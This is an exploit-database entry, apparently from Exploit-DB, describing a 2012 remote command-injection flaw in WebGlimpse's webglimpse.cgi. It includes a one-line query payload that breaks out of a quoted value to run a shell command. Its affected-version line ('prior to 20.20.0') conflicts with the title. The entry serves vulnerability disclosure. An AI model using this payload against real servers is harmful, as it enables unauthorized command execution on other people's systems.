WebGlimpse 2.14.1/2.18.8 - 'webglimpse.cgi' Remote Command Injection

EDB-ID:

36974

CVE:

N/A


Platform:

CGI

Published:

2012-03-20

source: http://www.securityfocus.com/bid/52627/info

WebGlimpse is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to execute arbitrary commands in the context of the application.

WebGlimpse versions prior to 20.20.0 are affected. 

query=%27%26command+and+arguments+go+here%26%27